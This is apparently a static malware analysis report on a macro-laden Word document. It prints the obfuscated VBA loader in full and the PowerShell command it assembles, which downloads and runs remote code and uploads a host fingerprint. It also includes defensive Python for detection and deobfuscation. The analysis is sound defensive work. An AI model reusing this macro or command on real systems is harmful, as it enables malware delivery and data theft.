Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e63c618930e51662…

MALICIOUS

Office (OOXML)

Size: 35.2 KB
Created: 2021-03-29 23:38:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-05-23
MD5: fc051a7af1e7dbc73620d5201d2a516f
SHA-1: 9892c7392a8f26ba7e9afcfd763db2d928b79db6
SHA-256: e63c618930e51662897b4daffae924217ad197e5937dd5dfbe54ef6f8ef9cb4a
Risk Score: 210

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1059.001 PowerShell (from the command line the macro assembles)
  • T1047 Windows Management Instrumentation (the macro launches the command through winmgmts:Win32_Process.Create)

The sample is a malicious OOXML (Word) document containing obfuscated VBA macros. Document_Open calls Main, which uses CreateObject to instantiate winmgmts:Win32_ProcessStartup (ShowWindow set to 1, i.e. a visible window) and winmgmts:Win32_Process, then calls Win32_Process.Create to launch PowerShell through WMI. Neither 'winmgmts' nor 'powershell' appears literally in the source: every string is assembled at run time from over a hundred one-fragment functions joined with '+'. Folding that chain in the extracted macros.bas (below) gives the following command line, reproduced exactly as the macro builds it:

powershell $WebC =&('new-object')Net.webclient;$vari = $env:userprofile+'/Documents/file.exe';$vari2 = $env:userprofile+'/Documents/temp.txt';$WebC.Downloadfile('http://localhost/sysinfo.txt',$vari2);$systeminfo = Invoke-Expression (get-content -path $vari2);$WebC.Downloadfile('http://localhost/payloads.txt',$vari2);$path = ((get-content -path $vari2 | Where-Object {$_ -like ($systeminfo + '*')}) -split '#')[1];$WebC.Downloadfile('http://localhost/' + $path,$vari);New-Item ($env:usfile + '\test.txt');Set-Content ($env:userprofile + '\test.txt') $systeminfo;$WebC.Uploadfile('http://localhost/test.txt',($env:userprofile + '\test.txt'));[Diagnostics.Process]::Start($vari);

In sequence it: downloads sysinfo.txt and executes its contents with Invoke-Expression (arbitrary remote code; the result is kept as a host fingerprint); downloads payloads.txt and picks the line whose prefix matches that fingerprint, taking the second '#'-delimited field as a payload path; downloads that payload to %USERPROFILE%\Documents\file.exe; writes the fingerprint to %USERPROFILE%\test.txt and posts it back with WebClient.UploadFile; and finally starts file.exe via [Diagnostics.Process]::Start. Two details are as extracted, not editorial: every URL points at http://localhost/, so the sample as analysed has no external C2, and the New-Item argument reads $env:usfile because the 'erpro' fragment is missing from the source, so that call does not target the profile directory. This is the spearphishing-attachment initial-access pattern; because the launch goes through WMI, the PowerShell child is parented by WmiPrvSE.exe rather than WINWORD.EXE, which defeats detections keyed only on an Office parent process.
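The launch path matters for detection: the macro source instantiates winmgmts:Win32_Process and calls its Create method, and a process created that way runs under the WMI provider host, so the PowerShell child's parent is WmiPrvSE.exe and not WINWORD.EXE. A rule that only looks for an Office parent misses it. The triage below is an added example, not part of this report or of any product it names; it runs over a handful of constructed Sysmon-style process-creation records (hosts, users, pids and the benign inventory script are made up) and flags both process-tree shapes, falling back to command-line markers taken from the reconstructed command when no Office start is visible.

```python
from datetime import datetime, timedelta

OFFICE = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
WMI_HOST = "wmiprvse.exe"
WINDOW = timedelta(minutes=5)  # how long after an Office start a WMI-spawned shell is suspicious
# Fragments of the reconstructed command that a hunt can pivot on (lower-cased).
CMDLINE_MARKERS = ("net.webclient", "downloadfile", "invoke-expression", "[diagnostics.process]::start")

# Constructed Sysmon-style process-creation records (Event ID 1 fields), not real telemetry.
EVENTS = [
    {"ts": "2021-05-23T10:00:00", "host": "ws01", "user": "CORP\\alice", "pid": 4100,
     "image": "WINWORD.EXE", "parent": "explorer.exe", "cmdline": "WINWORD.EXE /n invoice.docm"},
    {"ts": "2021-05-23T10:00:07", "host": "ws01", "user": "CORP\\alice", "pid": 4200,
     "image": "powershell.exe", "parent": "WmiPrvSE.exe",
     "cmdline": "powershell $WebC =&('new-object')Net.webclient;"
                "$WebC.Downloadfile('http://localhost/sysinfo.txt',$vari2)"},
    {"ts": "2021-05-23T10:30:00", "host": "ws02", "user": "CORP\\bob", "pid": 5100,
     "image": "powershell.exe", "parent": "WINWORD.EXE", "cmdline": "powershell -nop -w hidden -enc AAAA"},
    # Benign: a WMI-driven inventory script with no Office activity on the host.
    {"ts": "2021-05-23T11:00:00", "host": "ws03", "user": "CORP\\svc-inv", "pid": 6100,
     "image": "powershell.exe", "parent": "WmiPrvSE.exe", "cmdline": "powershell -File C:\\scripts\\inventory.ps1"},
]


def triage(events):
    """Return [(pid, reason)] for script hosts that look like Office-macro children.

    Three checks, in priority order: the classic WINWORD.EXE -> powershell.exe tree;
    the WMI launch used by this sample, where the parent is WmiPrvSE.exe and the only
    link to Office is an Office process started within WINDOW by the same user on the
    same host; and, as a fallback, a command line carrying two or more of the
    download-and-execute markers.
    """
    office_starts = {}  # (host, user) -> [Office start times seen so far]
    alerts = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        t = datetime.fromisoformat(e["ts"])
        key = (e["host"], e["user"])
        image, parent = e["image"].lower(), e["parent"].lower()
        if image.upper() in OFFICE:
            office_starts.setdefault(key, []).append(t)
            continue
        if image not in SCRIPT_HOSTS:
            continue
        reason = None
        if parent.upper() in OFFICE:
            reason = "office_child_script_host"
        elif parent == WMI_HOST and any(
            timedelta(0) <= t - s <= WINDOW for s in office_starts.get(key, [])
        ):
            reason = "wmi_spawned_script_host_after_office"
        elif sum(m in e["cmdline"].lower() for m in CMDLINE_MARKERS) >= 2:
            reason = "download_and_execute_cmdline"
        if reason:
            alerts.append((e["pid"], reason))
    return alerts


if __name__ == "__main__":
    for pid, reason in triage(EVENTS):
        print(pid, reason)
```

The WMI rule keys on host and user because Win32_Process.Create runs the child under the caller's token, so the macro's PowerShell carries the same user as the Word process even though its parent is WmiPrvSE.exe; the inventory script on ws03 is not flagged because no Office process started for that user in the window and its command line carries none of the markers.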

Heuristics (7)

  • VBA project inside OOXML (medium; 4 related findings) OOXML_VBA
    Document contains a VBA project: VBA macros present
  • Obfuscated auto-exec VBA loader (critical) OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. In this sample the decoder is a concatenation chain: over a hundred single-purpose functions each return a short fragment, and the sink arguments ('winmgmts:Win32_Process', 'Startup' and the PowerShell command line) only exist once Main has joined them with '+'.
    Matched line in script
    Public Sub Main()
        Set FRysWnMxHe = CreateObject(WyfazEQPUs() + AvocFLLYWi())
        FRysWnMxHe.ShowWindow! = 1
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Sub Main()
        Set FRysWnMxHe = CreateObject(WyfazEQPUs() + AvocFLLYWi())
        FRysWnMxHe.ShowWindow! = 1
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (low) OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Public Sub Document_Open()
        Main
  • Suspicious extracted artifact (high) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 28 URLs below carry the same label, "In document text (OOXML body / shared strings)", and all are OOXML, DrawingML and markup-compatibility XML namespace identifiers that Word writes into the package markup of ordinary documents; they are schema names, not network indicators. The download and upload endpoints the macro actually uses (http://localhost/...) are absent from this list because they never exist as literals: the macro assembles them at run time.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/drawing/2016/ink
    • http://schemas.microsoft.com/office/drawing/2017/model3d
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2018/wordml/cex
    • http://schemas.microsoft.com/office/word/2016/wordml/cid
    • http://schemas.microsoft.com/office/word/2018/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
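The OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER finding above and the macros.bas preview below show the obfuscation in full: every string is split across one-purpose functions and glued with '+', sometimes through a function called without parentheses, a local temporary, or a self-append (X = X + ...). The resolver below is an added example, not part of this report or of oletools, that statically folds such chains instead of running the macro. It is exercised here on a constructed macro of the same shape (names and strings are made up; example.invalid is a reserved, non-routable host), and it accepts the extracted macros.bas text unchanged as src because that file uses only the three statement shapes it handles.

```python
import re

# Header of a parameterless Sub/Function; the body runs to the matching End line.
HEADER_RE = re.compile(r"^\s*(?:Public|Private)?\s*(Function|Sub)\s+(\w+)\(\)\s*$")
END_RE = re.compile(r"^\s*End (?:Function|Sub)\s*$")
ASSIGN_RE = re.compile(r"^(\w+)\s*=\s*(.+)$")
# One token of a '+' chain: "string literal" | Name() call | bare Name.
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|(\w+)\(\)|(\w+)')

# Constructed macro in the shape of the report's macros.bas; names and strings
# are made up and example.invalid is a reserved, non-routable host.
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisDocument"
Public Sub Main()
    Set obj = CreateObject(A() + "Startup")
    obj.ShowWindow! = 1
    r = CreateObject(A()).Create(Cmd(), N(), obj, N())
End Sub
Public Function A()
    A = "winm" + "gmts:Win32" + "_Process"
End Function
Public Function Cmd()
    Cmd = P1() + P2
End Function
Public Function P1()
    P1 = "pow" + "ersh" + "ell $x = 'http://exa" + "mple.inva" + "lid/x'"
End Function
Public Function P2()
    P2 = ";[Diagno"
    tmp = "cess]::Sta"
    P2 = P2 + "stics.Pro" + tmp + "rt($x)"
End Function
Public Function N()
    N = Null
End Function
'''


def parse_routines(src):
    """Map name -> (kind, [stripped body lines]) for every parameterless routine."""
    routines, name, kind, body = {}, None, None, []
    for line in src.splitlines():
        m = HEADER_RE.match(line)
        if m:
            kind, name, body = m.group(1), m.group(2), []
        elif name and END_RE.match(line):
            routines[name] = (kind, body)
            name = None
        elif name and line.strip():
            body.append(line.strip())
    return routines


class ConcatResolver:
    """Folds VBA functions that only build strings with '+': direct chains, calls
    without parentheses (X = A + B) and locals with self-append (X = X + tmp).
    Anything else raises rather than guessing; a self-referential cycle ends in
    Python's own RecursionError."""

    def __init__(self, src):
        self.routines = parse_routines(src)
        self.cache = {}

    def resolve(self, name):
        if name in self.cache:
            return self.cache[name]
        kind, body = self.routines[name]
        if kind != "Function":
            raise ValueError(f"{name} is a Sub and returns nothing")
        env = {}  # locals assigned inside this function, including its own name
        for stmt in body:
            m = ASSIGN_RE.match(stmt)
            if not m:
                raise ValueError(f"unsupported statement in {name}: {stmt!r}")
            env[m.group(1)] = self.eval_chain(m.group(2), env)
        self.cache[name] = env.get(name, "")  # VBA returns the variable named after the function
        return self.cache[name]

    def eval_chain(self, expr, env):
        parts = []
        for lit, call, ident in TOKEN_RE.findall(expr):
            if call:
                parts.append(self.resolve(call))
            elif ident == "Null":
                parts.append(None)
            elif ident in env:
                parts.append(env[ident])
            elif ident in self.routines:
                parts.append(self.resolve(ident))  # call written without ()
            elif ident:
                raise NameError(f"unknown identifier {ident!r} in {expr!r}")
            else:
                parts.append(lit.replace('""', '"'))
        # VBA: "a" + Null is Null, so one Null part poisons the whole chain.
        return None if any(p is None for p in parts) else "".join(parts)

    def deobfuscate_sub(self, name):
        """The Sub's body with every Func() call replaced by its resolved literal."""
        _, body = self.routines[name]

        def fold(m):
            fn = m.group(1)
            if self.routines.get(fn, ("",))[0] != "Function":
                return m.group(0)  # CreateObject(...) and other externals are left alone
            value = self.resolve(fn)
            return "Null" if value is None else '"' + value.replace('"', '""') + '"'

        return [re.sub(r"\b(\w+)\(\)", fold, stmt) for stmt in body]


if __name__ == "__main__":
    print("\n".join(ConcatResolver(SAMPLE_VBA).deobfuscate_sub("Main")))
```

Resolving the return-variable convention (a VBA function returns whatever was last assigned to its own name) is what makes the self-append shape in the sample's TfPnBgUZrL and KzayZlXNRV fold correctly; evaluating the entry Sub instead of the whole module also keeps unused decoys such as the duplicated RtLWyjnfyk out of the output.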

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9900 bytes
SHA-256: cd957b31130363fb229c2686b09e742af415e3402586c787c2cc2702f174572f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
87 of 137 identifiers look randomly generated (e.g. 'AgmleRGLDd'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
    Main
End Sub
Public Sub Main()
    Set FRysWnMxHe = CreateObject(WyfazEQPUs() + AvocFLLYWi())
    FRysWnMxHe.ShowWindow! = 1
    oNNTfllotP = CreateObject(WyfazEQPUs()).Create(BzWxNFgaWy(), iuYTMLNKAQ(), FRysWnMxHe, iuYTMLNKAQ())
End Sub
Public Function BzWxNFgaWy()
    BzWxNFgaWy = BZVEZYvaeC() + RFROqiGAsy() + SYwaxQFdFn() + bsTtNsIrSt() + YfyvpxtdsH() + qwaHVenBFw() + OcLhfgnwLp()
End Function
Public Function BZVEZYvaeC()
    BZVEZYvaeC = WToZzcWjaR() + "ell $" + RmMaNSZHRY() + PDwWygobun() + "/file.e"
End Function
Public Function WToZzcWjaR()
    WToZzcWjaR = "pow" + "ersh"
End Function
Public Function EgqHMQXLXT()
    EgqHMQXLXT = "Web" + "C =&"
End Function
Public Function yJzrmUuOUO()
    yJzrmUuOUO = EgqHMQXLXT() + "('ne" + "w-object"
End Function
Public Function RmMaNSZHRY()
    RmMaNSZHRY = yJzrmUuOUO() + "')Ne" + "t.webc"
End Function
Public Function JSTqCgSmtO()
    JSTqCgSmtO = "lient;$"
End Function
Public Function ZycNPEiNOj()
    ZycNPEiNOj = "vari = $e" + "nv:use"
End Function
Public Function qKfOiYgaom()
    qKfOiYgaom = "rprofile" + "+'/Doc"
End Function
Public Function xDNwWKIGGu()
    xDNwWKIGGu = "uments"
End Function
Public Function PDwWygobun()
    PDwWygobun = JSTqCgSmtO() + ZycNPEiNOj() + qKfOiYgaom() + xDNwWKIGGu()
End Function
Public Function RFROqiGAsy()
    RFROqiGAsy = gpxyyVPtSL() + mnhJKgQGbs() + rFHhTkoMJj() + wVqSrHSzoS()
End Function
Public Function AtTBRJlRjG()
    AtTBRJlRjG = "xe'" + ";$va"
End Function
Public Function kAVuEdkaPM()
    kAVuEdkaPM = "ri2 =" + " $env:u"
End Function
Public Function gpxyyVPtSL()
    gpxyyVPtSL = AtTBRJlRjG() + kAVuEdkaPM() + "serprof"
End Function
Public Function IdGAJyLWDE()
    IdGAJyLWDE = "ile+'/D" + "ocumen"
End Function
Public Function RrqHqOQeRb()
    RrqHqOQeRb = "p.txt';" + "$Web"
End Function
Public Function rFHhTkoMJj()
    rFHhTkoMJj = RrqHqOQeRb() + "C.Downl"
End Function
Public Function mnhJKgQGbs()
    mnhJKgQGbs = IdGAJyLWDE() + "ts/tem"
End Function
Public Function etgtvQwEqc()
    etgtvQwEqc = "oadfil" + "e('htt"
End Function
Public Function hDnrbuEDmR()
    hDnrbuEDmR = etgtvQwEqc() + "p://loc" + "alhos"
End Function
Public Function kINgnijAQp()
    kINgnijAQp = "t/sys" + "info.t" + "xt',$va"
End Function
Public Function wVqSrHSzoS()
    wVqSrHSzoS = hDnrbuEDmR() + kINgnijAQp()
End Function
Public Function SYwaxQFdFn()
    SYwaxQFdFn = mPxXsCkmGj()
End Function
Public Function vONfHOaScx()
    vONfHOaScx = "ri2" + ");$syst"
End Function
Public Function AgmleRGLDd()
    AgmleRGLDd = "eminf"
End Function
Public Function dbgWgYOjTa()
    dbgWgYOjTa = vONfHOaScx() + AgmleRGLDd() + "o = Inv"
End Function
Public Function wczbmRiQfP()
    wczbmRiQfP = "oke-Ex" + "pressi"
End Function
Public Function yGoVXqAYfG()
    yGoVXqAYfG = "on (get" + "-cont"
End Function
Public Function sBgzzaxbLc()
    sBgzzaxbLc = "ent -pa" + "th $va"
End Function
Public Function buYbxSpqLG()
    buYbxSpqLG = wczbmRiQfP() + yGoVXqAYfG() + sBgzzaxbLc()
End Function
Public Function BrIzDBaMOn()
    BrIzDBaMOn = "ri2);$W" + "ebC.Dow"
End Function
Public Function GUNsruLeHe()
    GUNsruLeHe = "nloadf" + "ile('h" + "ttp://l"
End Function
Public Function HfNTScWRKD()
    HfNTScWRKD = BrIzDBaMOn() + GUNsruLeHe()
End Function
Public Function ecmoPYfTob()
    ecmoPYfTob = "ocalho"
End Function
Public Function ofxrzvAzaO()
    ofxrzvAzaO = ecmoPYfTob() + "st/pa"
End Function
Public Function SePnXglLDb()
    SePnXglLDb = ofxrzvAzaO() + "yl"
End Function
Public Function mPxXsCkmGj()
    mPxXsCkmGj = dbgWgYOjTa() + buYbxSpqLG() + HfNTScWRKD() + SePnXglLDb()
End Function
Public Function bsTtNsIrSt()
    bsTtNsIrSt = YCzjhvvXft() + LgBXXkoNHQ() + UNMlLEeQIp()
End Function
Public Function lDyXSespeg()
    lDyXSespeg = "oad" + "s.txt'"
End Function
Public Function CrRrRIDTEh()
    CrRrRIDTEh = lDyXSespeg() + ",$va" + "ri2)"
End Function
Public Function fCyjEXrJwJ()
    fCyjEXrJwJ = ";$pat" + "h = ((g"
End Function
Public Function XdqiwcRqjp()
    XdqiwcRqjp = fCyjEXrJwJ() + "et-con" + "tent -p"
End Function
Public Function YCzjhvvXft()
    YCzjhvvXft = CrRrRIDTEh() + XdqiwcRqjp()
End Function
Public Function FpcsZYjiXB()
    FpcsZYjiXB = "ath $va" + "ri2 | W"
End Function
Public Function KilWWhpCbh()
    KilWWhpCbh = "here-Ob" + "ject {"
End Function
Public Function jXyYUikpzC()
    jXyYUikpzC = FpcsZYjiXB() + KilWWhpCbh()
End Function
Public Function yrHleuKqIV()
    yrHleuKqIV = jXyYUikpzC() + "$_ -li" + "ke ($s"
End Function
Public Function LgBXXkoNHQ()
    LgBXXkoNHQ = yrHleuKqIV() + "ystemi" + "nfo + '"
End Function
Public Function cWBtIRhBRn()
    cWBtIRhBRn = "*')}) "
End Function
Public Function mByJMkIgXf()
    mByJMkIgXf = "-spl"
End Function
Public Function UNMlLEeQIp()
    UNMlLEeQIp = cWBtIRhBRn() + mByJMkIgXf()
End Function
Public Function YfyvpxtdsH()
    YfyvpxtdsH = UPwTrYZtjQ() + VLzKzqMYMC() + VgHZvaWgYl() + woXQQfZWml()
End Function
Public Function ozlPulKlbd()
    ozlPulKlbd = "it '#'" + ")[1"
End Function
Public Function dJctTdjcRI()
    dJctTdjcRI = ozlPulKlbd() + "];$We"
End Function
Public Function VoCnvojTEW()
    VoCnvojTEW = "bC.D" + "ownlo"
End Function
Public Function QkBJwBnRmB()
    QkBJwBnRmB = "adfi"
End Function
Public Function gofYscfDGs()
    gofYscfDGs = "ttp:" + "//lo"
End Function
Public Function LRbNpRxkPq()
    LRbNpRxkPq = "le('h" + gofYscfDGs()
End Function
Public Function UPwTrYZtjQ()
    UPwTrYZtjQ = dJctTdjcRI() + VoCnvojTEW() + QkBJwBnRmB() + LRbNpRxkPq()
End Function
Public Function XcMAhuUnqE()
    XcMAhuUnqE = "calho" + "st/' "
End Function
Public Function ZzwoVomjKC()
    ZzwoVomjKC = "+ $pa" + "th,$"
End Function
Public Function VLzKzqMYMC()
    VLzKzqMYMC = XcMAhuUnqE() + ZzwoVomjKC() + "vari)"
End Function
Public Function tAEiRDgTtD()
    tAEiRDgTtD = ";New-" + "Ite"
End Function
Public Function RtLWyjnfyk()
    RtLWyjnfyk = tAEiRDgTtD() + "m ($e" + "nv:us"
End Function
Public Function VgHZvaWgYl()
    VgHZvaWgYl = tAEiRDgTtD() + "m ($e" + "nv:us"
End Function
Public Function wFCmXQJgJS()
    wFCmXQJgJS = "file "
End Function
Public Function OxIvDANHwe()
    OxIvDANHwe = "+ '\t"
End Function
Public Function APARMJdHyl()
    APARMJdHyl = "est"
End Function
Public Function VvYINWPlRE()
    VvYINWPlRE = ".txt'"
End Function
Public Function woXQQfZWml()
    woXQQfZWml = wFCmXQJgJS() + OxIvDANHwe() + APARMJdHyl() + VvYINWPlRE()
End Function
Public Function qwaHVenBFw()
    qwaHVenBFw = LsrCfNKpcp() + jasbhhEAMJ() + RAPcgnpoxD()
End Function
Public Function ToCRHhlJEE()
    ToCRHhlJEE = ");Se"
End Function
Public Function BYIXvautgO()
    BYIXvautgO = "t-Co"
End Function
Public Function YbeVHHOvII()
    YbeVHHOvII = "nten"
End Function
Public Function BApTGbYXTr()
    BApTGbYXTr = "t ($en"
End Function
Public Function CtRZAsIVcp()
    CtRZAsIVcp = YbeVHHOvII() + BApTGbYXTr()
End Function
Public Function tzpvzrhyZN()
    tzpvzrhyZN = "v:use"
End Function
Public Function nnbnHvoCrB()
    nnbnHvoCrB = "rpro" + "fil"
End Function
Public Function HomMaSeDNk()
    HomMaSeDNk = "e + '\" + "test.t"
End Function
Public Function FSfwGGmGwL()
    FSfwGGmGwL = tzpvzrhyZN() + nnbnHvoCrB() + HomMaSeDNk() + "xt') $s"
End Function
Public Function LsrCfNKpcp()
    LsrCfNKpcp = ToCRHhlJEE() + BYIXvautgO() + CtRZAsIVcp() + FSfwGGmGwL() + "yste"
End Function
Public Function bMATjgZivm()
    bMATjgZivm = "minfo;$W"
End Function
Public Function xIVkWGlfbn()
    xIVkWGlfbn = bMATjgZivm() + "ebC.U" + "ploa"
End Function
Public Function VCBOGABHPM()
    VCBOGABHPM = "dfil" + "e('ht"
End Function
Public Function OeRADPrrjX()
    OeRADPrrjX = VCBOGABHPM() + "tp:/" + "/loc"
End Function
Public Function jasbhhEAMJ()
    jasbhhEAMJ = xIVkWGlfbn() + OeRADPrrjX()
End Function
Public Function ILgGOtNjwt()
    ILgGOtNjwt = "alho" + "st/t"
End Function
Public Function RytRxkonJV()
    RytRxkonJV = "est.t" + "xt',("
End Function
Public Function RAPcgnpoxD()
    RAPcgnpoxD = ILgGOtNjwt() + RytRxkonJV() + "$e"
End Function

Public Function OcLhfgnwLp()
    OcLhfgnwLp = TfPnBgUZrL() + KzayZlXNRV()
End Function
Public Function TfPnBgUZrL()
    TfPnBgUZrL = "nv:use" + "rprof" + "ile + '\te"
    HvpuHezaKJ = ";[Diagno"
    TfPnBgUZrL = TfPnBgUZrL + "st.txt'))" + HvpuHezaKJ
End Function
Public Function KzayZlXNRV()
    KzayZlXNRV = "stics.Pro" + "cess]:"
    FZIQlMvTCz = "ari);"
    KzayZlXNRV = KzayZlXNRV + ":Sta" + "rt($v" + FZIQlMvTCz
End Function
Public Function WyfazEQPUs()
    WyfazEQPUs = arVnHugYyx() + uoKadlUGIS() + EwjULORcHb() + vLAcsSwYzJ() + mdpEwFcsmq() + gOWJqRYRDU()
End Function
Public Function arVnHugYyx()
    arVnHugYyx = "win"
End Function
Public Function uoKadlUGIS()
    uoKadlUGIS = "mgm"
End Function
Public Function EwjULORcHb()
    EwjULORcHb = "ts:W"
End Function
Public Function vLAcsSwYzJ()
    vLAcsSwYzJ = "in32"
End Function
Public Function mdpEwFcsmq()
    mdpEwFcsmq = "_Pro"
End Function
Public Function gOWJqRYRDU()
    gOWJqRYRDU = "cess"
End Function
Public Function AvocFLLYWi()
    AvocFLLYWi = bKTetgFGAo() + WsAKdYaXhm() + eawMByjuSN()
End Function
Public Function bKTetgFGAo()
    bKTetgFGAo = "Sta"
End Function
Public Function WsAKdYaXhm()
    WsAKdYaXhm = "rt"
End Function
Public Function eawMByjuSN()
    eawMByjuSN = "up"
End Function
Public Function iuYTMLNKAQ()
    iuYTMLNKAQ = Null
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 99840 bytes
SHA-256: bce2418ec398f0f441ba8c078f166f760bc285a0210f4ca9eb6067fb4d241fd9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
460 of 696 identifiers look randomly generated (e.g. 'xdRc4d52p55TPeeUFPNg4sB7XVgxvqu6Kn2zr') — consistent with name-mangling obfuscation.